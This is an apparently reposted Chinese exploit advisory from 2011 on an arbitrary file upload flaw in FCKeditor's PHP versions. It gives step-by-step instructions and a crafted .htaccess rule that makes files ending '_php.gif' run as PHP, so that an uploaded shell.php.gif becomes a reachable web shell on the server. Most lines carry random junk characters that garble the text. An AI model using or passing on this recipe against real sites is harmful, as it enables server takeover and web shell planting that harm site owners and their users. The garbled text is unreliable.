FCKeditor所有php版本Upload上传漏洞5 a8 D+ }& o8 r
作者:佚名 来源:本站整理 发布时间:2011-10-25 7:39:07
. R; V W9 L: A1 Q' a" ^减小字体 增大字体' \! H {' p" B
[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability8 y+ R* h/ u( [% T: Q6 ]) S
[+] Date: 2011
7 O6 t1 y: M) K+ C0 Q, M[+] Author : sinesafe.cn) b% G/ _$ \! t2 U
[+] Website : WwW.sinesafe.cn
7 x8 N8 G+ z; a5 Q: C' a- K———————————————————
7 W L& Q; R" y! I: e# W0 }1.create a htaccess file:, a0 G) `! M4 \' P
code:/ Y, j1 W, ~/ k2 O
<FilesMatch “_php.gif”>
2 ?7 i) f8 q) v- e: T2 v& @SetHandler application/x-httpd-php0 q6 ?/ X5 B7 \: J. v o1 Q
</FilesMatch>
& X6 s# U. }* C% I4 e$ x) Z( x
) e( [1 s3 r% A* n, C2 A4 |/ V+ P2.Now upload this htaccess with FCKeditor.
6 j0 U6 Z( _1 Y
6 ~4 j. k, V0 ~# zhttp://www.sinesafe.cn/FCKeditor ... er/upload/test.html# ^. K6 ?4 X4 t4 ]0 J
U4 y; E2 p0 C( |http://www.sinesafe.cn/FCKeditor ... onnectors/test.html
( s9 d ]# P0 J* l Q. s+ [ U2 h; m7 Z6 T- s) C
———————————————————————————————-8 Y( I P$ h/ \. K
3.Now upload shell.php.gif with FCKeditor.) o3 {/ K+ f" s* ?9 ^* h
4.After upload shell.php.gif, the name “shell.php.gif” change to “shell_php.gif” automatically.
& F1 Z0 Z, k7 D1 Y, D/ Y5.http://www.sinesafe.cn/anything/shell_php.gif
" c0 X) e- W" y$ `9 b# U, u" l6.Now shell is available from server. |
) t# Z8 ?/ ]3 i% V* J& V; i; i3 v1 q' K/ ]
8 Z3 _8 M* b) w5 M7 M |